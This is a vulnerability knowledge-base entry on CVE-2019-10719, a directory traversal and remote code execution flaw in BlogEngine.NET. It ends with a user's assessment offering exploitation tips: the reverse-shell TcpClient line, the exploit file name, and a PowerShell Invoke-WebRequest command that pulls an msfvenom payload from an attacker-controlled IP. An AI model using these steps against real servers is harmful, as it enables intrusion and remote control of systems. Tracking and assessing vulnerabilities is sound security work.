AttackerKB AKB:977F5E8B-D00F-48D9-99B4-8B72A21C8D33
History: Jun 21, 2019 - 12:00 a.m.

CVE-2019-10719

2019-06-21 00:00:00
attackerkb.com

EPSS: 0.042 (Low), Percentile: 92.3%

BlogEngine.NET 3.3.7.0 and earlier allows Directory Traversal and Remote Code Execution because file creation is mishandled, related to /api/upload and BlogEngine.NET/AppCode/Api/UploadController.cs. NOTE: this issue exists because of an incomplete fix for CVE-2019-6714.

Recent assessments:

Leafry at February 06, 2021 4:28pm UTC reported:

This attack was extremely easy to use. My jaw almost hit the ground at the ease. My only worry is that this will be a very hard attack to find in the wild as it depends on specific versions of the software to work.

Things to keep in mind:
-You will need to change your IP address and port inside the script. Near the beginning of the script, there is a line for System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", $LPORT). Set the host and port accordingly.
-I have had several instances where I would need to restart the BlogEngine server or the reverse shell would hang up in some terminal windows but not others; this exploit creates a very unstable shell.
-The script should be named PostView.ascx

Moving from here:
-It is recommended to upgrade to a different shell as soon as possible.
-I have had the most luck with Meterpreter. Creating a reverse shell with msfvenom and then uploading it to the BlogEngine server with PowerShell. -> powershell Invoke-WebRequest -Uri http://10.10.10.10:8888/reverse.exe -Outfile reverse.exe

Assessed Attacker Value: 0
